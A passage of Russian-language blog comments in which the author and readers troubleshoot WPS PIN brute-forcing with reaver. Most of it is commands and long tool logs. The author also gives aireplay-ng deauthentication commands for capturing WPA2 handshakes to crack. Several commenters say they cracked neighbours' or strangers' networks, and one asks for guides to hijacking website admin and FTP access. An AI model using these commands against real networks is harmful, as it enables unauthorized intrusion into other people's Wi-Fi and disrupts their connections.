        [+] Switching mon0 to channel 9
        [+] Switching mon0 to channel 10
        [+] Switching mon0 to channel 11
        [+] Switching mon0 to channel 12
        [+] Switching mon0 to channel 13
        [+] Switching mon0 to channel 14
        [+] Switching mon0 to channel 1
        [+] Switching mon0 to channel 2
        [+] Switching mon0 to channel 3
        [+] Switching mon0 to channel 4
        [+] Switching mon0 to channel 5
        [+] Switching mon0 to channel 6
        [+] Switching mon0 to channel 7
        [+] Switching mon0 to channel 8
        [+] Switching mon0 to channel 9
        [+] Switching mon0 to channel 10
        [+] Switching mon0 to channel 11
        [+] Switching mon0 to channel 12
        [+] Switching mon0 to channel 13
        [+] Switching mon0 to channel 14
        [+] Switching mon0 to channel 1
        [+] Switching mon0 to channel 2
        [+] Switching mon0 to channel 3
        [+] Switching mon0 to channel 4
        [+] Switching mon0 to channel 5
        [+] Switching mon0 to channel 6
        [+] Switching mon0 to channel 7
        [+] Switching mon0 to channel 8
        [+] Switching mon0 to channel 9
        [+] Switching mon0 to channel 10
        [+] Switching mon0 to channel 11
        [+] Switching mon0 to channel 12
        [+] Switching mon0 to channel 13
        [+] Switching mon0 to channel 14
        [+] Switching mon0 to channel 1
        [+] Switching mon0 to channel 2
        [+] Switching mon0 to channel 3
        [+] Switching mon0 to channel 4
        [+] Switching mon0 to channel 5
        [+] Switching mon0 to channel 6
        [+] Switching mon0 to channel 7

        • Hub-lex says:

          F0:7D:68:95:65:82 11 -95 1.0 No DMITRY-Network – канал № 11

          Switching mon0 to channel … – это значит что канал не задан

          reaver -i mon0 -b F0:7D:68:95:65:82 -с 11 -vv – задать канал № 11

          • kripto75 says:

            Кто бы мог подумать…. ща попробую….СПАСИБО!!!!

          • kripto75 says:

            да и ещё. что может означать вот эта строчка:
            [!] WPS transaction failed (code: 0?02), re-trying last pin
            иногда проскакивает код 03, просто после этой строки начинаются все беды с поиском сети и т.д.

          • Hub-lex says:

            “re-trying last pin” – попробовать последний pin.
            Лучше показывайте весь вывод, а то иногда не понятно

          • Wlan says:

            Как задать канал
            тоесть ка правильно прописать это направление в строке

  • sanches says:

    Что делать когда доходит до 99.99% и начинает перебирать 12349989 бесконечно?

    • Hub-lex says:

      Покажите команды, которые использовали. Шаг за шагом + покажите вывод команд.

  • rex says:

    Уважаемый Hub-lex , ломать сети все научились :)
    Предлагаю перейти к другой статье УК РФ, а именно: что делать дальше со взломанной сетью. :)

  • Loman says:

    Одну сеть посчитал быстро – за 3 часа. Пароль подошел.
    Попробовал на еще одной сети. Pin рассчитался. Но вот пароль очень длинный (64 символа).
    И ssid сети не совпало с истинным значением.

    Решил проверить этот пин восьмизначный ХХХХХХХХ (не палюсь, не палюсь))) так:
    reaver -i mon0 -b (ну понятно, мак) -c 2 -vv -p XXXXXXXX

    Раз пин известен, пароль ривер выдал. Тоже 64 символа. Но абсолютно другие!
    Еще раз пробую ту же команду с известным пином, и опять другие 64 символа пароля.

    Эту сетку оставить в покое?
    Первый роутер был длинк, не из новинок – стандарт n урезанный до 150, а второй тплинк n 300 (полноценный).
    Наверно, новизна этого тплинка повлияла на процесс.

  • Loman says:

    Почитал, пишут, что так происходит, когда WPS включен, а WPA пароля нет.
    И ривер заполняет поле WPA мусором длиной 64 символа.
    Но решения не увидел.
    В моем случае сеть требует пароль (уточню – WPA2), который уж всяко не 64 символа. И возможно это проявляется “уникальное поведение конкретного роутера”.

    • Hub-lex says:

      Вот что на этот счет говорят в Issue 25: “By default, the AP that is started in not configured state will generate a random PSK and move to configured state when the first registration protocol run is completed successfully.”
      И в Issue 108: “Some APs generate new WPA keys if they don’t already have one configured. Reaver will always show the WPA key that the AP has returned.”

      Loman, это ваша АР так себя ведет или чужая?

      p.s.: Желательно найти материал по этому делу! Если найдете, дайте знать =)

      • Loman says:

        Свою то я сломал за 3 часа, а вот чужая не поддается.
        Вроде как тп-линки, получается, более бронированные…

        • Hub-lex says:

          Если все таки удастся ее ломануть, тогда зайди в web-интерфейс и посмотри на настройки. Или тех-характеристики вышли, ок? Интересно почему АР себя так ведет…

        • Alex says:

          Привет Так и не решили проблему ?

  • Loman says:

    Так как все-таки сохранять сессию ривера на винт?

  • Kse. says:

    Инфо нашел на ачате:

    Если пользуетесь загрузочным DVD , сессия сохраняется в дирр. /usr/local/etc/reaver в виде двух файлов F4EC38B3D744.wpc и reaver.db . Эти файлы и нужно скопировать и сохранить на жест. диск.
    При следующей загрузке с DVD ,открываете “File system” и далее /usr/local/etc/reaver , из последней удаляете один имеющийся там файл , и вставляете туда предварительно сохраненные F4EC38B3D744.wpc и reaver.db вот и все , сессия по той-же точке начнется с того-же процента выполнения на котором остановлена.

    От себя: если файл сохранить не успел, но знаешь примерно на какой пин коде все это дело остановилось, можно запустить взлом этой сетки, подождать, пока пройдет пару пин кодов и нажать ctrl+с. Далее открываем wpc файл по тому адресу, который выше дан, и вырезаем там все пин коды до того пина, на котором остановились. Только первые пару столбцов трогать не надо, там где будут по одной цифре (1, 0, 0, что то вроде того)

  • Serg says:

    Здрасте! Подскажите пожалуйста, если у wash показывает 5 сеток и в строках WPS Locked написано No, то это означает что можна ломать сетку с помощью reaver?

  • dnk says:

    Уж не откажите в помощи, а? :cry:

  • dnk says:

    ПОМОГИТЕ! Как установить драйвер на d-link? Уже которую неделю бьюсь, всё время вижу такое:http://f1.fotozal.com/f/827/13480b.jpg

  • Loman says:

    Риверу можно задавать начальное приближение для пина? (Для экономии времени.)
    Допустим, пин начинается на 4 и мне это точно известно.
    Или интервал, в котором лежит пин, типа от 20000000 до 41000000 ?

  • Александр says:

    доброго времени суток,а существует какой нибудь брутфорс под винду? у меня дома ловит две сетки, пользователи точно чайники и на паролях не озадачены. что бы забить словарик и средствами винды тестить какждый пас на подлинность? сил уже нет сидет на жпрс, перехал в сибирскую глушь инет третий месяц не могу провести ибо нет техвозможноти

    • Hub-lex says:

      Насчет Windows сказать ничего не могу, потому что ломать из под винды считаю извращением =)

  • leonety says:

    Доброе всем. как понимать это:
    WARNING. Detected AP rate limiting, waiting 60 sec before re-checking
    спасибо

  • aleks says:

    одинаково, я пробывал загрузится с usb все ровно не видит wifi карты :sad:

  • klimvin says:

    Подскажите пожалуйста
    Reaver v1.4 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner

    [+] Waiting for beacon from F0:7D:68:95:65:77
    [+] Switching mon0 to channel 1
    [+] Switching mon0 to channel 2
    [+] Switching mon0 to channel 3
    [+] Switching mon0 to channel 4
    [+] Switching mon0 to channel 5
    [+] Switching mon0 to channel 6
    [+] Switching mon0 to channel 7
    [+] Switching mon0 to channel 8
    [+] Switching mon0 to channel 9
    [+] Switching mon0 to channel 10
    [+] Switching mon0 to channel 11
    [+] Associated with F0:7D:68:95:65:77 (ESSID: loko-Network)
    [+] Trying pin 12345670
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [!] WARNING: Receive timeout occurred
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0?02), re-trying last pin
    [+] Trying pin 12345670
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [!] WARNING: Receive timeout occurred
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0?02), re-trying last pin
    [+] Trying pin 12345670
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Received M1 message
    [+] Sending WSC NACK
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0?03), re-trying last pin
    [+] Trying pin 12345670
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [!] WARNING: Receive timeout occurred
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0?02), re-trying last pin
    [+] Trying pin 12345670
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [!] WARNING: Receive timeout occurred
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0?02), re-trying last pin
    [+] Trying pin 12345670
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [!] WARNING: Receive timeout occurred
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0?02), re-trying last pin
    [+] Nothing done, nothing to save.
    [+] 0.00% complete @ 2012-04-05 07:45:09 (0 seconds/pin)

    в конце концов около 2-3 часов а после останавливается

    • Hub-lex says:

      Switching mon0 to channel … – переключение каналов. Старайтесь указывать, на каком канале работает АР. Чтобы это указать, нужно добавить в команду reaver следующее: -с (номер_канала)

      Sending WSC NACK – когда видите такое, тогда попробуйте запустить reaver с параметром –no-nacks

  • max says:

    надо, в конце первого шага, объяснить (не опытным читателям как я) как подключиться к инету. а то делаеш всё пошагово точно но не хрена в конце не выходи т. к. инет не подключён и reaver не установился ! а не опытный пользователь от куда знает установился он(reaver) или нет!?
    нашол решение на другом сайте, там копия вашей статьи, но с не большой дописочкой. вот она: Выберите Applications> Internet Wicd Network Manager.
    Выберите свою сеть и нажмите Connect, введите пароль, если необходимо, нажните кнопку ОК и нажните кнопку Connect вторично………..

  • Loman says:

    А я нашел, куда ривер сохраняет сессию.
    Нужны 2 файла: reaver.db и xxxxxxxxxxxx.wpc (где иксы – мак адрес сети, которую ломаете).
    И лежат они по пути: File system/usr/local/etc/reaver
    Где все это искать в бактраке?
    Верхний левый угол дисплея, вкладка Places, и выбираете из выпадающего списка любое место, хоть desktop.
    Откроется File browser. Здесь и разделы винчестера видны.
    В нем выбираете File system, ну и далее как в винде, идете по пути system/usr/local/etc/reaver.

    И есть два варианта сохранения. Копируете эту папку reaver с 2 файлами на винчестер, и когда вновь запустите бактрак, перед запуском ривера, скопируете ее в то же место File system/usr/local/etc/reaver.

    А второй вариант без копирования: после нажатия ctrl+с и сохранения сессии (когда ривера уже нет в оперативной памяти), открыть файл xxxxxxxxxxxx.wpc встроенным в бактрак прогой text editor и запомнить первую строку из 4 цифр. Это первые 4 цифры пина, на котором остановился ривер. Допустим 3316.
    А когда вновь загрузите бактрак, запускайте ривер для расчета пина, пусть минуту посчитает. Потом жмем ctrl+с. Открываем файл xxxxxxxxxxxx.wpc с помощью text editor и меняем первую строку на то число, что запоминали минус один, т.е. 3315, на всякий случай, чтобы ривер не пропустил случайно пин. Т.е. мы его немного назад возвращаем в расчетах.
    Я так уже пробовал делать, все ок.

  • max says:

    экспериментирую на своей сети,за сутки всего 5%
    что ж оно так долго? и о каких там 5-ти 10-ти часах шла речь не понятно. и вообще это нормально?

  • max says:

    спасибо за ответ! последнее из того, что выводится:5.29% complete @ 2012-04-10 17:32:52 (164 seconds/pin)
    [+] Trying pin 05725670
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [!] WARNING: 25 successive start failures
    [+] Sending EAPOL START request
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0×02), re-trying last pin
    [+] Trying pin 05725670
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received WSC NACK
    [+] Sending WSC NACK
    [+] Trying pin 05735679
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request

    вы писали:Sending WSC NACK – когда видите такое, тогда попробуйте запустить reaver с параметром –no-nacks. скажите пожалуйста, а что означает этот вывод: Sending WSC NACK и стоит ли мне сейчас вводить этот параметр? за ранее спасибо.

  • maksym says:

    Zdravstvuite Hub-lex
    U menia tozhe samoe:
    iwconfig
    airmon-ng start wlan1 (USB Adapter)
    airodump-ng mon0
    wash -i mon0
    reaver -i mon0 -b bssid xxxxxxxx-vv
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0?02), re-trying last pin
    [+] Trying pin 12345670
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received WSC NACK
    [+] Sending WSC NACK
    [+] Trying pin 12345670
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [+] 0.00% complete@ 2012-04-12 14:05:20 (0 seconds/pin)
    I tak vsiu noch.
    Ne mogli by vy privesti primer comandy (reaver) vkliuchaia (–no-nacks)? A imenno:
    root@bt:~# revear -i mon0 -b bsssidxxxxxxxxxxx -c 1 –no-nacks -vv
    ili
    root@bt:~# revear -i mon0 -b bsssidxxx -c 1 -vv –no-nacks ?
    Spasibo zaranee za otvet.

  • aleks says:

    а что делать если wps отключен? как тогда быть?

    • Hub-lex says:

      Если WPS отключен или его нет на АР, тогда нужно поймать handshake и попытаться его расшифровать.

      • kripto75 says:

        Добрый день, Hab-lex! Подскажите, а как поймать handshake, а точнее команду которую надо ввести, а так-же , по возможности команду которую можно ввести для деактивации МАС адреса от которого ловлю handshake. Спасибо!!!

        • Hub-lex says:

          Добрый день!
          Handshake вы можете поймать, только если на АР висят другие клиенты – это важно! Чтобы его поймать, вы должны послать АР пакет на деаутентификацию клиента:
          # aireplay-ng -0 1 -a 00:22:B0:BE:75:3D -c 70:F1:A1:72:B4:25 mon0
          -0 – деаутентификация
          1 – количество пакетов
          -a – MAC-адрес точки доступа
          -c – MAC-адрес клиента, к которому применяется деаутентификация

          Второй вопрос не понял, поясните.

          • kripto75 says:

            Я просто ошибся : вместо деактивации, надо было написать деаутентификация! Спасибо, всё теперь понятно. И ещё планируете ли Вы писать статью о том как поймать handshake, и соответственно как его потом расшифровать. Спасибо за статьи, всё очень понятно и доступно написано!!!

          • Hub-lex says:

            Большое спасибо)
            Да статьи по Wi-Fi будут! Еще столько классных штук можно делать и я хочу их показать и описать=)
            По возможности буду стараться выкладывать статьи быстрее, но там уж как со временем получится.

          • timon says:

            процесс пошел .. а дальше ?

          • Hub-lex says:

            Давайте в skype: hub-lex-21. Здесь не очень удобно.

          • kripto75 says:

            Попробовал, вот что пишет:
            root@bt:~# aireplay-ng -0 2 -a B8:A3:ХХ:ХХ:ХХ:F4 -c 6C:E9:ХХ:ХХ:ХХ:AC mon0

            20:50:49 Waiting for beacon frame (BSSID: B8:A3:ХХ:ХХ:ХХ:F4) on channel 11

            20:50:50 Sending 64 directed DeAuth. STMAC: [6C:E9:ХХ:ХХ:ХХ:AC] [ 0|54 ACKs]

            20:50:50 Sending 64 directed DeAuth. STMAC: [6C:E9:ХХ:ХХ:ХХ:AC] [ 7|54 ACKs]

            root@bt:~# aireplay-ng -0 5 -a B8:A3:ХХ:ХХ:ХХ:F4 -c 6C:E9:07:42:0C:AC mon0

            20:51:46 Waiting for beacon frame (BSSID: B8:A3:86:1A:77:F4) on channel 11

            20:51:47 Sending 64 directed DeAuth. STMAC: [6C:E9:ХХ:ХХ:ХХ:AC] [ 2|61 ACKs]

            20:51:47 Sending 64 directed DeAuth. STMAC: [6C:E9:ХХ:ХХ:ХХ:AC] [ 0|62 ACKs]

            20:51:48 Sending 64 directed DeAuth. STMAC: [6C:E9:ХХ:ХХ:ХХ:AC] [ 0|61 ACKs]

            20:51:48 Sending 64 directed DeAuth. STMAC: [6C:E9:ХХ:ХХ:ХХ:AC] [ 3|58 ACKs]

            20:51:49 Sending 64 directed DeAuth. STMAC: [6C:E9:ХХ:ХХ:ХХ:AC] [ 4|58 ACKs]

            CH 11 ][ Elapsed: 24 mins ][ 2012-04-20 21:12

            BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

            B8:A3:ХХ:ХХ:ХХ:F4 -85 0 9198 183 0 11 54e WPA2 TKIP PSK My_Wi-Fi

            BSSID STATION PWR Rate Lost Frames Probe

            Что-то не так? пробовал указывать деаутентификацию и 100 и 200 число вводил, а handshak всё нет и нет :cry: .... так-же команда :
            besside-ng mon0 желаемого handshake не даёт. .. Что не так делаю?

          • Hub-lex says:

            Шаг за шагом покажите действия, которые выполняли и вывод.

          • алексей says:

            а как можно узнать MAC-адрес клиента, к которому применяется деаутентификация?

          • Hub-lex says:

            Выполните команду:
            # airodump-ng mon0
            Для примера посмотри вот это – http://www.levinkv.ru/wp-content/uploads/2011/12/airodump_part_3.png
            в самом низу АР с МАС = 00:02:CF:AE:7E:E8 и подключенный к ней клиент с МАС = 48:5D:60:F3:3D:88

            p.s.: старайтесь искать сами. в блоге выбираете категорию по Wi-Fi и читаете статьи в которых все написано. потому что на подсказках вы не изучаете (голова не работает), а действуйте по шаблону. таким образом вы мало чему научитесь. (СОВЕТ)

          • алексей says:

            спасибо за совет!про других клиентов ничего не находил,наверное плохо искал…

          • kripto75 says:

            Для Алексей: после ввода команды # airodump-ng mon0 надо просто подольше подождать… и бедет тебе счастье в виде MAC-адресов клиентов. Сам я жду минут 15-20 … после этого все адреса как на ладони. Правда иногда замечал что некоторые сети перескакивают на другой канал….х.з. почему..

          • алексей says:

            что то не ловится handshake . вот что получилось
            root@bt:~# aireplay-ng -0 1 -a C8:60:00:93:55:B4 -c 00:13:02:2C:75:FD mon0
            16:14:23 Waiting for beacon frame (BSSID: C8:60:00:93:55:B4) on channel 4
            16:14:33 No such BSSID available.
            Please specify an ESSID (-e).
            что это означает?

          • Hub-lex says:

            Please specify an ESSID (-e) – означает что не указан SSID АР. Команда должна иметь след. вид: # aireplay-ng -0 1 -a C8:60:00:93:55:B4 -c 00:13:02:2C:75:FD -e mon0

            НО алексей, вы опять ничего не пишите. предыдущие комментарии от меня кажется остались не услышанными. Еще раз вым говорю, предоставьте Все команды, которые вводите и их вывод.

          • алексей says:

            комментарии услышаны,через день может попробую и покажу всю картинку своих действий.дома то я себя и двух соседей взломал.потому что включен WPS, а вот в другом месте попался WI-FI без WPS ,вот и мучаюсь…

          • Hub-lex says:

            Хорошо, как будете готовы пишите.

          • алексей says:

            как то что то опять не получилось root@bt:~# iwconfig
            lo no wireless extensions.

            wlan0 IEEE 802.11bg ESSID:off/any
            Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
            Retry long limit:7 RTS thr:off Fragment thr:off
            Encryption key:off
            Power Management:off

            eth0 no wireless extensions.

            root@bt:~# airmon-ng start wlan0

            Found 2 processes that could cause trouble.
            If airodump-ng, aireplay-ng or airtun-ng stops working after
            a short period of time, you may want to kill (some of) them!

            PID Name
            2354 dhclient3
            2412 dhclient3
            Process with PID 2412 (dhclient3) is running on interface wlan0

            Interface Chipset Driver

            wlan0 Atheros AR2425 ath5k – [phy0]
            (monitor mode enabled on mon0)

            root@bt:~# airodump-ng mon0

            CH 3 ][ Elapsed: 8 s ][ 2012-05-16 16:10

            BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

            C8:60:00:93:55:B4 -73 15 0 0 1 54e WPA2 CCMP PSK Oleg
            00:02:CF:CF:41:01 -73 19 0 0 4 54 WPA2 CCMP PSK KMB g
            F8:D1:11:43:CC:A0 -93 7 0 0 8 54e. WPA2 CCMP PSK TP-LIg
            00:13:1A:57:65:A0 -102 2 1 0 1 11e. OPN <leng

            BSSID STATION PWR Rate Lost Frames Probe

            CH 4 ][ Elapsed: 8 s ][ 2012-05-16 16:10

            BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

            C8:60:00:93:55:B4 -73 15 0 0 1 54e WPA2 CCMP PSK Oleg
            00:02:CF:CF:41:01 -73 20 0 0 4 54 WPA2 CCMP PSK KMB
            F8:D1:11:43:CC:A0 -94 8 0 0 8 54e. WPA2 CCMP PSK TP-LINK
            00:13:1A:57:65:A0 -102 2 1 0 1 11e. OPN <length

            BSSID STATION PWR Rate Lost Frames Probe

            CH 4 ][ Elapsed: 8 s ][ 2012-05-16 16:10

            BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

            C8:60:00:93:55:B4 -73 15 0 0 1 54e WPA2 CCMP PSK Oleg
            00:02:CF:CF:41:01 -71 21 0 0 4 54 WPA2 CCMP PSK KMB
            F8:D1:11:43:CC:A0 -94 8 0 0 8 54e. WPA2 CCMP PSK TP-LINK_4
            00:13:1A:57:65:A0 -102 2 1 0 1 11e. OPN <length:

            BSSID STATION PWR Rate Lost Frames Probe

            CH 4 ][ Elapsed: 8 s ][ 2012-05-16 16:10

            BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

            C8:60:00:93:55:B4 -73 15 0 0 1 54e WPA2 CCMP PSK Oleg
            00:02:CF:CF:41:01 -70 22 0 0 4 54 WPA2 CCMP PSK KMB
            F8:D1:11:43:CC:A0 -94 8 0 0 8 54e. WPA2 CCMP PSK TP-LINK_43
            00:13:1A:57:65:A0 -102 2 1 0 1 11e. OPN <length:

            BSSID STATION PWR Rate Lost Frames Probe

            CH 12 ][ Elapsed: 4 mins ][ 2012-05-16 16:14

            BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

            00:02:CF:CF:41:01 -65 703 9 0 4 54 WPA2 CCMP PSK KMB
            C8:60:00:93:55:B4 -71 374 39 0 1 54e WPA2 CCMP PSK Oleg
            F8:D1:11:43:CC:A0 -82 249 23 0 8 54e. WPA2 CCMP PSK TP-LINK_43CCA
            00:13:1A:57:65:A0 -101 29 18 0 1 11e. OPN
            1C:7E:E5:FF:90:72 -101 62 0 0 11 54e WEP WEP DIR-300NRU
            D8:5D:4C:D2:E3:C8 -100 21 0 0 11 54 . WPA2 CCMP PSK Internet

            BSSID STATION PWR Rate Lost Frames Probe

            (not associated) 30:38:55:C4:31:3A -93 0 - 1 0 5 00:02:CF:CF:41:01 00:19:D2:23:5E:D3 -84 54 - 1 0 82 KMB F8:D1:11:43:CC:A0 00:1C:BF:3B:7E:70 -97 54e- 1e 0 20
            root@bt:~# aireplay-ng -0 1 -a 00:02:CF:CF:41:01 -c 00:19:D2:23:5E:D3 mon0
            16:15:41 Waiting for beacon frame (BSSID: 00:02:CF:CF:41:01) on channel 12
            16:15:51 No such BSSID available.
            Please specify an ESSID (-e).
            root@bt:~# aireplay-ng -0 1 -a 00:02:CF:CF:41:01 -c 00:19:D2:23:5E:D3 -e mon0
            No replay interface specified.
            "aireplay-ng --help" for help.
            root@bt:~#

  • dnk says:

    А только под линуксом бэктрэк запускается? под виндой нельзя?

  • vova says:

    Здравствуйте. Пытаюсь взломать свою сеть и ничего не получается.
    1. WPA2-PSK включен
    2. Сигнал отличный(роутер в 3 метрах)
    3. фильтрация по MAC адресу выключена.
    reaver работает, но постоянно выдает:
    ! WARNING : Fialed to associate with XX:XX:XX:xx:xx:xx (ESSID: XXXX)
    P.S. такое же сообщение при взломе чужой сетки

    • Hub-lex says:

      Здравствуйте. Покажите, какие команды вводили (ввод) и их вывод.

      • vova says:

        все по инструкции:
        1 >>apt-get update
        2 >>apt-get install reaver
        3 >>iwconfig
        <>airmon-ng start wlan0
        <>airodump-ng mon0
        <>reaver -i mon0 -b XX:XX…:XX -vv
        <<waiting from baecon from XX:…:XX
        <<switching mon0 to channel 11
        << ! WARNING : Fialed to associate with XX:XX:XX:xx:xx:xx (ESSID: XXXX)
        дальше все повторяется пока не отключю.

  • byba72 says:

    Hub-lex очень тебе благодарен за статью.Я не оч продвинутый но уменя все получилось.с BT5R1 не невышло а BT5R2-на ура. наверное потому что в него интегрирован reaver.Для статистики-на ноуте lenovoG575 c win7 не пошло…а на samsungR20 c win xp все получилось.соседский TP-Link за 11часов.свой d-link за 14часов.долго но результативно.еще раз спасибо

  • алексей says:

    а если клиент отключит на какое то время вай-фай,чего тогда делать?

  • алексей says:

    а то у меня 47% отсканировал и клиент пропал и это всё за 12 часов.обидно будет начинать всё заново

    • Hub-lex says:

      Вы не могли бы давать более информативные сообщения?! Давайте все сначала и по шагам.

      • алексей says:

        за 12 часов reaver обработал 47%,а потом клиент вай-вай исчез.минут через двадцать появился снова и reaver продолжил свою работу.на ночь клиент по любому отключит вай-фай,вот я и спрашиваю.что мне делать дальше?ждать когда утром он опять включится?это мне получается надо оставить работающий reaver и комп соответсивенно не выключать?

        • Hub-lex says:

          Вы можете сохранить сессию и спокойно идти домой, а когда снова вернетесь, возобновить ее.
          О том как сохранить сессию, вы можете прочитать в комментарии от Loman в этой статье.

  • dnk says:

    Блин. 100500-ый раз уже пробую, ничего не получается. При поиске сетей в wich network manager пишет no wireles network found. При команде iwkonfig похожая фигня. Пробовал как на ноутбуке, так и на десктопе. ничего… Уж подскажите?

    • dnk says:

      PАБЫЛ СКАЗАТЬ, ЧТО В ОБЕИХ СЛУЧАЯХ ИНДЕКАТОР WIFI НЕ ПОДАЁТ ПРИЗНАКОВ ЖИЗНИ…

  • arsenal3008 says:

    Hub-lexЕсли WPS отключен или его нет на АР, тогда нужно поймать handshake и попытаться его расшифровать…
    Чем расшифровывать, aircrack или reaver?

    • Hub-lex says:

      Да, если WPS на АР отключен или его просто нет. Тогда нужно поймать handshake между клиентом АР и самой АР. Расшифровать handshake можно с помощью aircrack-ng.

      p.s.: cтарайтесь пожалуйста разбираться в деле, которым вы занимаетесь. Т.е. посмотрите свой вопрос в Интернете. Старайтесь не просто сделать все по шаблону, а именно разобраться что, как и почему.

  • Андрей says:

    Hub-lex подскажите пожалуйста что сделал не правильно при запуске reaver выдает command not faund (стоит БТ-5Р1 файл reaver db установлен) также не проходит команда sudo wash-i mon0 выдает то же самое

    • Hub-lex says:

      Если вы запускаете reaver и на это действие появляется ошибка “command not found”. Тогда это значит, что reaver у вас не установлен. Попробуйте воспользоваться вот этой статьей (http://www.levinkv.ru/ustanovka-reaver-v-backtrack-5-r1/). Чтобы попробовать установить reaver. Если же у вас не получится, тогда вы всегда можете скачать BackTrack 5 R2. В нем reaver & wash уже установлены.

  • алексей says:

    качайте BackTrack 5 R2, в него reaver уже встроен.всё намного проще получается,когда нет интернета.Уважаемый,hub-lex!обновите инфу пожалуйста.людям облегчите их мучения :smile:

    • Hub-lex says:

      алексей, спасибо вам за совет! Информация обновлена в самом начале статьи.

  • dnk says:

    Блин. 100500-ый раз уже пробую, ничего не получается. При поиске сетей в wich network manager пишет no wireles network found. При команде iwkonfig похожая фигня. Пробовал как на ноутбуке, так и на десктопе. ничего… Уж подскажите? И ещё: устанавливал оба бэктрека, при попытке подключится индекатор wifi не мигает…

    • Hub-lex says:

      Может быть у вас проблема с драйверами? Покажите выводы команд: iwconfig, lspci.

  • Khch says:

    Я скачал BackTrack 5 Live DVD iso но комп не загружается с диска. В чем причина – в биосе все настроен нормально.?

    • Hub-lex says:

      Не могу точно ответить – мало информации.
      Попробуйте зайти в Boot-menu, когда загружается компьютер. И выберите ваш диск от туда. Также можно загрузить iso на флешку – скорость считывания будет гораздо выше чем с диска.

  • Олег says:

    Добрый день Hub-lex! Хочу искренне выразить вам благодарность за статьи, хорошие и полезные, а главное написанные понятным языком, что любой чайник всё поймет.
    У меня к Вам вот какой вопрос: планируете ли вы статьи по взлому сайтов, а так-же как перехватить “АДМИНКУ” сайта. Было бы очень интересно узнать о “движках” используемых на сторонних сайтах и способах проверки на безопасность, ведь многие сайты созданы в LINUX и как можно осуществить захват FTP админ и т.д. Думаю что данные статьи будут очень популярны!!!!
    Ещё раз ОГРОМНОЕ СПАСИБО за Ваши статьи. !! Лично я узнал много полезной информации, ну и конечно халявный WiFi.!!!

    • Hub-lex says:

